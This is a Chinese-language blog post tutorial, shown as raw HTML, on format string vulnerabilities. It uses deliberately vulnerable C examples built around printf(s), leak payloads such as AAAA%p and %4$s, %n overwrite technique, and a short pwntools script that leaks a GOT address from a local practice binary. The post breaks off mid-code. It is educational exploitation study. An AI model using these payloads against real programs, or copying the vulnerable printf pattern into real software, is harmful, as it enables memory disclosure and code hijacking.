<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="wutong">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://wutong01304.github.io/2023/07/23/fmtstr/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="格式化字符串漏洞（Format String Vulnerability）是一种常见的安全漏洞，它允许攻击者执行任意的代码或者读取敏感的内存信息。这种漏洞通常出现在使用printf函数或其变种时，开发者没有正确地处理用户输入的格式化字符串。攻击者可以通过在格式化字符串中插入一些特殊的控制字符，来控制printf函数的行为。 一、基本原理1.1基本知识格式化字符串函数就是将计算机内存中表示的数据转">
<meta property="og:type" content="article">
<meta property="og:title" content="格式化字符串漏洞+整数溢出">
<meta property="og:url" content="https://wutong01304.github.io/2023/07/23/fmtstr/index.html">
<meta property="og:site_name" content="wutong">
<meta property="og:description" content="格式化字符串漏洞（Format String Vulnerability）是一种常见的安全漏洞，它允许攻击者执行任意的代码或者读取敏感的内存信息。这种漏洞通常出现在使用printf函数或其变种时，开发者没有正确地处理用户输入的格式化字符串。攻击者可以通过在格式化字符串中插入一些特殊的控制字符，来控制printf函数的行为。 一、基本原理1.1基本知识格式化字符串函数就是将计算机内存中表示的数据转">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf6.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf7.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf8.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf9.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf10.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf11.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf12.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf13.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf14.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf15.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf16.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf17.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf18.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf19.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf20.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf21.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf22.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf23.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf24.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf26.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf25.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/int1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/int3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/int2.png?x-oss-process=style/watermark">
<meta property="article:published_time" content="2023-07-23T03:04:14.000Z">
<meta property="article:modified_time" content="2023-08-18T08:02:49.691Z">
<meta property="article:author" content="wutong">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="fmtstr">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf1.png?x-oss-process=style/watermark">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <!--- Page Info-->
    
    <title>
        
            格式化字符串漏洞+整数溢出 -
        
        wutong
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"wutong01304.github.io","root":"/","language":"en"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":false,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":2,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":false,"site_pv":false,"site_uv":false,"post_pv":false},"pjax":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"static","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"梧桐","subtitle":{"text":["梧桐生矣，于彼朝阳"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":false,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.2.1","navbar":{"auto_hide":false,"tags":{"Tags":{"icon":"fa-solid fa-tags","path":"/tags/"}},"categories":{"Categories":{"icon":"fa-solid fa-folder","path":"/categories/"}},"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Github":{"path":"https://github.com/wutong01304","icon":"github"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"cloud"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2023/7/1 11:45:14"};
    Global.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    Global.data_config = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                wutong
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                                    
                                        
                                            <i class="github"></i>
                                        
                                        GITHUB
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                             
                                
                                    <i class="github"></i>
                                
                                GITHUB
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
             
                <div class="article-title">         
                    <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstrcover.jpg" alt="格式化字符串漏洞+整数溢出" />
                    <h1 class="article-title-cover">格式化字符串漏洞+整数溢出</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-avatar.jpg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">wutong</span>
                            
                                <span class="author-label">Lv3</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-07-23 11:04:14</span>
        <span class="mobile">2023-07-23 11:04</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-08-18 16:02:49</span>
            <span class="mobile">2023-08-18 16:02</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/Study/">Study</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Pwn/">Pwn</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/fmtstr/">fmtstr</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <hr>
<p>格式化字符串漏洞（Format String Vulnerability）是一种常见的安全漏洞，它允许攻击者执行任意的代码或者读取敏感的内存信息。这种漏洞通常出现在使用printf函数或其变种时，开发者没有正确地处理用户输入的格式化字符串。攻击者可以通过在格式化字符串中插入一些特殊的控制字符，来控制printf函数的行为。</p>
<h1 id="一、基本原理"><a href="#一、基本原理" class="headerlink" title="一、基本原理"></a>一、基本原理</h1><h2 id="1-1基本知识"><a href="#1-1基本知识" class="headerlink" title="1.1基本知识"></a>1.1基本知识</h2><p>格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式</p>
<table>
<thead>
<tr>
<th align="center">函数</th>
<th align="left">基本介绍</th>
</tr>
</thead>
<tbody><tr>
<td align="center">printf</td>
<td align="left">输出到 stdout</td>
</tr>
<tr>
<td align="center">fprintf</td>
<td align="left">输出到指定 FILE 流</td>
</tr>
<tr>
<td align="center">vprintf</td>
<td align="left">根据参数列表格式化输出到 stdout</td>
</tr>
<tr>
<td align="center">vfprintf</td>
<td align="left">根据参数列表格式化输出到指定 FILE 流</td>
</tr>
<tr>
<td align="center">sprintf</td>
<td align="left">输出到字符串</td>
</tr>
<tr>
<td align="center">snprintf</td>
<td align="left">输出指定字节数到字符串</td>
</tr>
<tr>
<td align="center">vsprintf</td>
<td align="left">根据参数列表格式化输出到字符串</td>
</tr>
<tr>
<td align="center">vsnprintf</td>
<td align="left">根据参数列表格式化输出指定字节到字符串</td>
</tr>
<tr>
<td align="center">setproctitle</td>
<td align="left">设置 argv</td>
</tr>
<tr>
<td align="center">syslog</td>
<td align="left">输出日志</td>
</tr>
<tr>
<td align="center">err, verr, warn, vwarn</td>
<td align="left">其它输出函数</td>
</tr>
</tbody></table>
<p>以printf() 为例，它的第一个参数就是格式化字符串 ：”Color %s,Number %d,Float %4.2f”，然后 printf 函数会根据这个格式化字符串来解析对应的其他参数。</p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">   <span class="built_in">printf</span>(<span class="string">&quot;Color %s,Number %d,Float %4.2f&quot;</span>,<span class="string">&quot;red&quot;</span>,<span class="number">123456</span>,<span class="number">3.14</span>);  </span><br><span class="line">   <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;<span class="comment">//output: Color red,Number 123456,Float 3.14</span></span><br></pre></td></tr></table></figure></div>

<p>一些格式化字符串的含义：</p>
<ul>
<li>%d - 十进制 - 输出十进制整数</li>
<li>%s - 字符串 - 从内存中读取字符串</li>
<li>%x - 十六进制 - 输出十六进制数</li>
<li>%c - 字符 - 输出字符</li>
<li>%p - 指针 - 指针地址</li>
<li>%n - 到目前为止所写的字符数</li>
</ul>
<h2 id="1-2-栈内存分布"><a href="#1-2-栈内存分布" class="headerlink" title="1.2 栈内存分布"></a>1.2 栈内存分布</h2><p>以如下程序为例，输入字符s以后，程序会输出包括s在内的5个字符。%0.8x表示以十六进制形式打印无符号整数值，宽度为8位，左侧用0填充。</p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">  <span class="type">char</span> s[<span class="number">100</span>];</span><br><span class="line">  <span class="type">int</span> a = <span class="number">1</span>, b = <span class="number">0x22222222</span>, c = <span class="number">-1</span>;</span><br><span class="line">  <span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>, s);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;%08x.%08x.%08x.%s\n&quot;</span>, a, b, c, s);</span><br><span class="line">  <span class="built_in">printf</span>(s);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>在printf下断点，输入2以后栈分布如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf1.png?x-oss-process=style/watermark"
                     
                ></p>
<p>查看main的反汇编，可知esp所指的位置为printf的返回地址，紧接着是格式化字符串，然后是各个参数。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf2.png?x-oss-process=style/watermark"
                     
                ></p>
<p>即printf栈结构如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>继续运行，printf输出：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf4.png?x-oss-process=style/watermark"
                     
                ></p>
<p>然后程序执行到printf(s)的地方，s并没有指定它的格式化字符串，它的栈结构：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf5.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以看到，程序压入了两个‘2’在栈里面，也就是本来作为格式化字符串的地方压入了s，接着执行程序，输出s然后结束。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf6.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="1-3-溢出原理"><a href="#1-3-溢出原理" class="headerlink" title="1.3 溢出原理"></a>1.3 溢出原理</h2><p>如果我们输入的s不是一个正常字符，而是一个格式化字符串呢？再次调试，输入 %0.8x。栈结构：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf7.png?x-oss-process=style/watermark"
                     
                ></p>
<p>第一个printf正常输出：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf8.png?x-oss-process=style/watermark"
                     
                ></p>
<p>执行到printf(s)，没有指定的格式化字符串，压入两个 %0.8x：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf9.png?x-oss-process=style/watermark"
                     
                ></p>
<p>此时，程序会将第一个%0.8x当成指定的格式化字符串，从而输出十六进制长度为8位的数值，即输出为ffffd010。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf10.png?x-oss-process=style/watermark"
                     
                ></p>
<p>输入三个%08x.%08x.%08x时，由于没有指定参数，会将栈以外的其它地方当成参数输出。如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf11.png?x-oss-process=style/watermark"
                     
                ></p>
<p>也就是说，我们可以利用这种方式，泄露栈的其它地址。可以使用%3$x快速打印出第3个参数的值：%3$x 是一个格式说明符，$ 符号用于指定参数的位置，x 表示以十六进制格式输出参数值，表示将以十六进制格式输出第三个参数的值。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf12.png?x-oss-process=style/watermark"
                     
                ></p>
<h1 id="二、攻击原理"><a href="#二、攻击原理" class="headerlink" title="二、攻击原理"></a>二、攻击原理</h1><p>参考链接：<a class="link"   target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV19A411t7XF/?spm_id_from=333.999.0.0&vd_source=4481f768294d5110af6b9e0ab6a40ddd" >https://www.bilibili.com/video/BV19A411t7XF/?spm_id_from=333.999.0.0&amp;vd_source=4481f768294d5110af6b9e0ab6a40ddd <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h2 id="2-1-泄露地址"><a href="#2-1-泄露地址" class="headerlink" title="2.1 泄露地址"></a>2.1 泄露地址</h2><p>之前的方法是泄露栈上的变量值，没法泄露变量的地址。但是如果我们将某个函数got表的地址输入进去，利用格式化字符串打印got表中的内容，也就是函数的真实地址，利用libc偏移，就可以泄露出任意函数的地址栏了。假设这个地址存放的位置是printf的第k个参数，我们可以使用%k$x，将其打印出来。</p>
<p>确定格式化字符串是第几个参数，一般可以通过 [tag]%p%p%p%p%p%p%p%p%p 来实现，如果输出的内容跟我们前面的 tag 重复了，那就说明我们找到了，但是不排除栈上有些其他变量也是这个值，所以可以用一些其他的字符进行再次尝试。</p>
<p>输入AAAA%p%p%p%p%p%p%p（%p以指针格式输出参数），栈结构如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf13.png?x-oss-process=style/watermark"
                     
                ></p>
<p>将第一行AAAA%p%p%p%p%p%p%p当作格式化字符串，从%p开始，printf开始寻找参数，如上图第一个参数为0xffffd010，第二个0xf7fcf410，第三个为0x1，第四个为‘AAAA%p%p%p%p%p%p%p’，A的十六进制为41，%的十六进制为25，p的十六进制为70，8位一输出，即0x41414141（AAAA）0x70257025(%p%p)</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf14.png?x-oss-process=style/watermark"
                     
                ></p>
<p>即这里k&#x3D;4，溢出结构如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf15.png?x-oss-process=style/watermark"
                     
                ></p>
<p>yichen大佬用的使scanf的got地址，我调试了好几次，发现函数__x86.get_pc_thunk（获取在加载时动态定义的地址）没有加载下一条指令地址（也就是printf），然后地址一直打印不出来，也不知道为什么，也不知道怎么解决（就是上面AAAA%p%p%p%p%p%p%p前面0x1的位置，本来应该是个地址的）。然后我在代码里面加了一句puts(“Hello world!”); 重新编译后后，使用puts函数的got地址打印，打印成功了：</p>
<p>exp：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">&#x27;./fs1&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./fs1&#x27;</span>)</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(puts_got)</span><br><span class="line">gdb.attach(sh,<span class="string">&#x27;b *0x8048517&#x27;</span>)</span><br><span class="line">payload = p32(puts_got) + <span class="string">&#x27;%4$s&#x27;</span> <span class="comment">#payload为puts的got地址</span></span><br><span class="line"><span class="built_in">print</span> payload</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;%4$s\n&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(u32(sh.recv()[<span class="number">4</span>:<span class="number">8</span>])) <span class="comment">#后四个字节为打印出来的地址</span></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf16.png?x-oss-process=style/watermark"
                     
                ></p>
<p>调试结果：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf17.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="2-2-覆盖地址"><a href="#2-2-覆盖地址" class="headerlink" title="2.2 覆盖地址"></a>2.2 覆盖地址</h2><p>%n，不输出字符，但是把已经成功输入的字符个数写入对应的整型指针参数所指的变量。只要变量对应的地址可写，就可以利用格式化字符串来改变其对应的值。看一下%n的功能，代码如下：</p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">   <span class="type">int</span> s;</span><br><span class="line">   <span class="built_in">printf</span>(<span class="string">&quot;123456789%n s:&quot;</span>,&amp;s);</span><br><span class="line">   <span class="built_in">printf</span>(<span class="string">&quot;%d&quot;</span>,s);</span><br><span class="line">   <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>如上，%n统计之前的字符，并将其写入s所在的地址中，也就是s存储的就是9，运行结果：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fmtstr/pf18.png?x-oss-process=style/watermark"
                     
                ></p>
<p>如果我们的s是一个地址的话，就可以使用%n改变地址里面的值了，也就达到了我们覆盖地址的作用。只要确定覆盖地址和相对偏移，就可以进行覆盖了。</p>
<p>举例，如下代码：</p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> a = <span class="number">123</span>, b = <span class="number">456</span>;</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">  <span class="type">int</span> c = <span class="number">789</span>;</span><br><span class="line">  <span class="type">char</span> s[<span class="number">100</span>];</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;%p\n&quot;</span>, &amp;c);</span><br><span class="line">  <span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>, s);</span><br><span class="line">  <span class="built_in">printf</span>(s);</span><br><span class="line">  <span class="keyword">if</span> (c == <span class="number">16</span>) &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;modified c.&quot;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (a == <span class="number">2</span>) &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;modified a for a small number.&quot;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (b == <span class="number">0x12345678</span>) &#123;</span><br><span 